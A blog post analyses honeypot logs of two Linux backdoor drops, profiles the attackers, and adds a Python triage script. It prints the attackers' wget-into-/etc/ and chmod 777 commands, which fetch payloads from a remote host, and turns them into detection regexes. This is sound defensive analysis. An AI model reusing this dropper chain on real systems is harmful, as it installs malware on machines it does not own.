You can tell a lot about an attacker based upon their methods of attack.
- Automated attacks happen rapidly, with no time for typing
- Manual attacks happen slowly, as the attacker has to type commands
- Typos and misspellings indicate a manual attack
- The SSH client version string (the connection string) gives away what kind of operating system the attacker is using
Let's take a look at both pieces of the Linux/Bckdr-RKC malware I've received.
.xsyslog
First seen 2011-12-21 11:56:26
User connected from 64.62.224.250 (This is a United States IP address, no host name)
User SSH client was SSH-2.0-libssh2_1.3.0
11:56:27: User downloaded .xsyslog to /etc/ using "wget -P/etc/ http://216.83.44.229:99/.xsyslog"
11:56:28: User granted executable permission using "chmod 777 /etc/.xsyslog"
11:56:28: User performed a "cat /proc/version"
14:04:06: User disconnected
.ssyslog
First seen 2011-12-24 06:54:03
User connected from 61.147.75.6 (This is a Chinese IP address, no host name)
User SSH client was SSH-2.0-libssh2_1.3.0
06:54:06: User downloaded .ssyslog to /etc/ using "wget -P/etc/ http://216.83.44.229:99/.ssyslog"
06:54:08: User granted executable permission using "chmod 777 /etc/.ssyslog"
06:54:09: User performed a "cat /proc/version"
06:55:42: User disconnected
08:53:24: User reconnected and retried above procedure from 61.147.75.6
09:01:49: User disconnected
10:37:44: User reconnected and retried above procedure from 61.147.75.6 (did not disconnect)
Then a second connection appears:
User connected from 87.217.199.83 (83.199.217.87.dynamic.jazztel.es - from Spain)
User SSH client was SSH-2.0-PuTTY_Release_0.60
10:49:58: User connected and manually mistyped root password as 1234567
10:50:00: User re-entered correct root password as 123456
User proceeded to try to open the common Linux text editors "nano" and "pico"
User attempted to install "nano" and "pico" using yum.
10:51:05: Frustrated, the user sent a reboot command
10:51:23: 87.217.199.83 disconnects
10:57:36: 61.147.75.6 disconnects
What can we learn about the attacker from the above sequence of events?
- Both .xsyslog and .ssyslog were delivered by a libssh2 client, indicating a non-Windows system
- The remote install of .xsyslog and .ssyslog may be automated, due to the rapid entry of commands
- The remote install of .ssyslog was being monitored by its botmaster, who attempted to actually debug why the malware was not phoning home
- The botmaster/attacker has some working knowledge of how the .xsyslog and .ssyslog malware functions, and attempted to troubleshoot, indicating he/she is not simply a "script kiddie" using someone else's malware
- The botmaster is possibly located in Spain, or relayed through a compromised system in Spain
- The botmaster uses a Windows system, since the troubleshooting connection was performed using PuTTY.
Similarities between .xsyslog and its later counterpart, .ssyslog:
- Both pieces of malware were hosted by the same IP address.
- Both pieces of malware are placed in the /etc/ folder
- Both pieces of malware are executed by running /proc/version
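To make the heuristics from the opening list and the "what can we learn" / "similarities" sections repeatable, here is an added example (my own code, not part of the original post or of any honeypot product) that triages honeypot sessions automatically. It assumes a simple constructed log format of the form `date time EVENT detail`; the sample sessions below are constructed to mirror the post's write-up (times, addresses and commands are illustrative, and the banner-to-platform mapping is just the one the post uses). It scores command pacing (automated vs. manual), counts password typos with an edit-distance check, reads the client banner, flags the wget-to-/etc/, chmod 777, cat /proc/version install chain, and reports which download host appears in more than one session.

```python
"""Honeypot session triage using the heuristics described in the post (added example)."""
import re
from datetime import datetime
from statistics import median

# Constructed sample sessions modelled on the post's write-up; not real captures.
SESSIONS = {
    "xsyslog": [
        "2011-12-21 11:56:26 CONNECT 64.62.224.250 SSH-2.0-libssh2_1.3.0",
        "2011-12-21 11:56:27 CMD wget -P/etc/ http://216.83.44.229:99/.xsyslog",
        "2011-12-21 11:56:28 CMD chmod 777 /etc/.xsyslog",
        "2011-12-21 11:56:28 CMD cat /proc/version",
        "2011-12-21 14:04:06 DISCONNECT",
    ],
    "ssyslog": [
        "2011-12-24 06:54:03 CONNECT 61.147.75.6 SSH-2.0-libssh2_1.3.0",
        "2011-12-24 06:54:06 CMD wget -P/etc/ http://216.83.44.229:99/.ssyslog",
        "2011-12-24 06:54:08 CMD chmod 777 /etc/.ssyslog",
        "2011-12-24 06:54:09 CMD cat /proc/version",
        "2011-12-24 06:55:42 DISCONNECT",
    ],
    "troubleshoot": [
        "2011-12-24 10:49:58 CONNECT 87.217.199.83 SSH-2.0-PuTTY_Release_0.60",
        "2011-12-24 10:49:58 AUTH_FAIL 1234567",
        "2011-12-24 10:50:00 AUTH_OK 123456",
        "2011-12-24 10:50:20 CMD nano /etc/.ssyslog",
        "2011-12-24 10:50:35 CMD pico /etc/.ssyslog",
        "2011-12-24 10:50:50 CMD yum install nano",
        "2011-12-24 10:51:05 CMD reboot",
        "2011-12-24 10:51:23 DISCONNECT",
    ],
}

LINE_RE = re.compile(r"^(\S+ \S+) (\w+)(?: (.*))?$")
# The dropper chain seen in both sessions: hidden file fetched into /etc/,
# made world-executable, then the kernel version string read.
INSTALL_CHAIN = (
    re.compile(r"^wget\s+-P\s*/etc/?\s+https?://([^/:\s]+)(?::\d+)?/(\.\S+)$"),
    re.compile(r"^chmod\s+777\s+/etc/\.\S+$"),
    re.compile(r"^cat\s+/proc/version$"),
)


def parse(lines):
    """Turn 'date time EVENT detail' lines into (datetime, event, detail) tuples."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # tolerate a malformed line instead of dropping the session
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        events.append((ts, m.group(2), m.group(3) or ""))
    return events


def edit_distance(a, b):
    """Levenshtein distance: a typo is one or two edits away from the real password."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def client_os_hint(banner):
    """Platform guess from the SSH client banner, as the post reads it."""
    if banner.startswith("SSH-2.0-PuTTY"):
        return "Windows (PuTTY)"
    if "libssh2" in banner:
        return "non-Windows (libssh2)"
    return "unknown"


def typo_count(events):
    """Failed login followed within 60s by a success 1-2 edits away: a human mistyping."""
    n = 0
    for (t1, e1, d1), (t2, e2, d2) in zip(events, events[1:]):
        if (e1 == "AUTH_FAIL" and e2 == "AUTH_OK"
                and (t2 - t1).total_seconds() <= 60 and 0 < edit_distance(d1, d2) <= 2):
            n += 1
    return n


def command_pacing(events):
    """Median seconds between commands; under 2s is faster than anyone types."""
    times = [t for t, e, _ in events if e == "CMD"]
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    if not gaps:
        return None, "no commands"
    m = median(gaps)
    return m, "automated" if m < 2.0 else "manual"


def install_chain(events):
    """Return (download host, dropped file) if the three-stage chain appears in order."""
    stage, host, name = 0, None, None
    for c in (d for _, e, d in events if e == "CMD"):
        m = INSTALL_CHAIN[stage].match(c)
        if m:
            if stage == 0:
                host, name = m.group(1), m.group(2)
            stage += 1
            if stage == len(INSTALL_CHAIN):
                return host, name
    return None


def triage(lines):
    """Summarise one session with the post's attacker-profiling heuristics."""
    ev = parse(lines)
    connect = next((d for _, e, d in ev if e == "CONNECT"), " ")
    source, _, banner = connect.partition(" ")
    gap, verdict = command_pacing(ev)
    return {"source": source, "client_os": client_os_hint(banner), "median_gap_s": gap,
            "pacing": verdict, "typos": typo_count(ev), "install_chain": install_chain(ev)}


def shared_hosts(reports):
    """Download hosts used by more than one session: shared attacker infrastructure."""
    seen = {}
    for r in reports:
        if r["install_chain"]:
            seen[r["install_chain"][0]] = seen.get(r["install_chain"][0], 0) + 1
    return {h for h, n in seen.items() if n > 1}


if __name__ == "__main__":
    reports = [triage(s) for s in SESSIONS.values()]
    for name, r in zip(SESSIONS, reports):
        print(name, r)
    print("shared download hosts:", shared_hosts(reports))
```

The pacing threshold (2 seconds) and the edit-distance bound (2) are tuning choices, not facts from the post; on real honeypot data you would calibrate them against known manual sessions, because scripted tools that deliberately sleep between commands will read as "manual" under this simple median test.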